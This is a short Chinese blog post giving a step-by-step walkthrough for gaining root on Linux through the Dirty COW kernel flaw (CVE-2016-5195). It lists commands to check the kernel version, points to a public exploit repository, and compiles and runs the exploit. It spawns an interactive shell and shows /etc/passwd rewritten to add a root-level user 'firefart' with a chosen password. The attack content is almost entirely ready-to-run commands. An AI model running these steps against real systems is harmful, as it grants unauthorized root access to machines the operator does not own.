美文网首页
linux内核提权(脏牛CVE-2016-5195)

linux内核提权(脏牛CVE-2016-5195)

作者: migrate_ | 来源:发表于2020-04-24 17:04 被阅读0次
  • 漏洞范围:
    Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)
  • 查看版本信息
uname -a
uname -r
cat /etc/issue
cat /etc/*-release
1.jpg
  • 在脏牛的影响范围内,直接上传脚本
https://github.com/FireFart/dirtycow
  • 给脚本执行权限
chmod 777 dirty.c
  • 编译脚本
#利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt
2.jpg
  • 切换交互式shell
 python -c 'import pty;pty.spawn("/bin/sh")'
  • 执行脚本
./dirty 123456  //(密码)
3.jpg 4.jpg
  • /etc/passwd 文件已经更改
firefart:123456  //用户名:密码
//利用之前最后做个备份  /etc/passwd

相关文章

网友评论

      本文标题:linux内核提权(脏牛CVE-2016-5195)

      本文链接:https://www.haomeiwen.com/subject/ijbfwhtx.html